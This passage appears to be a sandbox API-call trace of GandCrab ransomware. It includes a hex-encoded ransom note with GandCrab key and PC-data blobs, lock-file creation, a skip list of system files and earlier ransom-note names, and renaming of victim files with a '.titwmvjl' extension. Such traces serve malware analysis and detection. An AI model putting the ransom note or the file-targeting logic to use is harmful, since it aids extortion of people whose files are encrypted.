x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.385] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0069.386] CloseHandle (hObject=0x2cc) returned 1 [0069.386] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.386] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.387] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x2bb)) [0069.387] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.387] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.387] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.387] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a09d2ca4deb61a.lock") returned 88 [0069.387] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0069.390] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.390] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\") returned 64 [0069.391] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*" [0069.391] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5033f8 [0069.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.391] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.391] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.391] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.391] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.391] lstrcmpW (lpString1="addressbook.acrodata", lpString2=".") returned 1 [0069.391] lstrcmpW (lpString1="addressbook.acrodata", lpString2="..") returned 1 [0069.391] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="addressbook.acrodata" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" [0069.391] lstrlenW (lpString=".titwmvjl") returned 9 [0069.391] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned 84 [0069.391] VirtualAlloc (lpAddress=0x0, dwSize=0xe8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.391] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata.titwmvjl") returned 93 [0069.391] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned 84 [0069.391] lstrlenW (lpString=".acrodata") returned 9 [0069.391] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.391] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".acrodata ") returned 10 [0069.392] lstrcmpiW (lpString1=".acrodata", lpString2=".titwmvjl") returned -1 [0069.392] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned 84 [0069.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned 84 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="desktop.ini") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="autorun.inf") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ntuser.dat") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="iconcache.db") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="bootsect.bak") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="boot.ini") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ntuser.dat.log") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="thumbs.db") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="KRAB-DECRYPT.html") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="CRAB-DECRYPT.html") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="ntldr") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="NTDETECT.COM") returned -1 [0069.392] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Bootfont.bin") returned -1 [0069.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata") returned 84 [0069.392] lstrlenW (lpString=".acrodata") returned 9 [0069.392] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.392] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".acrodata ") returned 10 [0069.392] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.392] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.393] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" (normalized: 